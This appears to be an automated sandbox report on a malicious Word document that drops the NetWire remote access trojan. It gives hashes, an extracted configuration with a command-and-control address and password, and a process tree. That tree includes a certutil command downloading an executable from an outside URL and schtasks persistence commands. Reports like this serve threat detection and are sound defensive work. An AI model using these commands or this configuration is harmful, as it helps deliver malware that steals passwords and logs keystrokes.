Analysis
-
max time kernel
98s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
30-09-2022 09:33
General
-
Target
RFQ 80479040.doc
-
Size
62KB
-
MD5
6328c4a16d653cb10c3b042301b2d6c3
-
SHA1
4dba059a50044581f2741868ce850618a042f0b5
-
SHA256
9e7f45fc3fe9b1849e1308f416aa57cf62588ca43359630649943b40fcf07856
-
SHA512
6d46cc27a4786b0072f1a53cdbd6e3c42e646b6f441ef39eee0630e37863c90bf8c8e40ee026af7cd98ac14474ff96b787ccab941f995fd7db80d0dcc4c2725f
-
SSDEEP
384:OkUgY5j96eYPKNiaI1WAE7OCb8iSUR/8dEv8krqrf4INzte/DZeIESy3uGjGWi2S:OP5I5I/q/qsfZ3qHGjG/owKSqXI
Malware Config
Extracted
netwire
37.0.14.206:3384
-
activex_autorun
false
-
copy_executable
true
-
delete_original
false
-
host_id
HostId-%Rand%
-
install_path
%AppData%\Install\Host.exe
-
keylogger_dir
%AppData%\Logs\
-
lock_executable
true
-
offline_keylogger
true
-
password
Password234
-
registry_autorun
false
-
use_mutex
false
Signatures
-
NetWire RAT payload 6 IoCs
-
Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 5 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 39 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ 80479040.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\certutil.exe"C:\Windows\System32\certutil.exe" -urlcache -split -f https://teqturn.com/goblin/ea05f1fD14F2Jju.exe C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe2⤵
- Process spawned unexpected child process
-
C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NksNHqr" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3A98.tmp"3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"{path}"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"{path}"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Install\Host.exe"C:\Users\Admin\AppData\Roaming\Install\Host.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NksNHqr" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA604.tmp"5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Install\Host.exe"{path}"5⤵
- Executes dropped EXE
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
1KB
MD5e3110e1fc5bfa53e5636b145c05a9dd2
SHA1ccaaa930eae7676f078baaafef310a0e60e2b196
SHA2567bd775873865bef88fe486aba38d1e26483aa5d9475b8f51149458eda843ba3a
SHA512aa095af6006f03afd5003013b7e9be9e338811ee0ca1647d37d9ef203e826c7e67486f81861f70653eb6125d2f49be6878d7d705eeff8936d2fd2ca00450a314
-
Filesize
1KB
MD5e3110e1fc5bfa53e5636b145c05a9dd2
SHA1ccaaa930eae7676f078baaafef310a0e60e2b196
SHA2567bd775873865bef88fe486aba38d1e26483aa5d9475b8f51149458eda843ba3a
SHA512aa095af6006f03afd5003013b7e9be9e338811ee0ca1647d37d9ef203e826c7e67486f81861f70653eb6125d2f49be6878d7d705eeff8936d2fd2ca00450a314
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
-
Filesize
204KB
-
-
Filesize
204KB
-
Filesize
204KB
-
-
Filesize
204KB
-
Filesize
204KB
-
-
Filesize
204KB
-
-
-
-
Filesize
624KB
-
Filesize
584KB
-
Filesize
5.6MB
-
Filesize
904KB
-
-
Filesize
40KB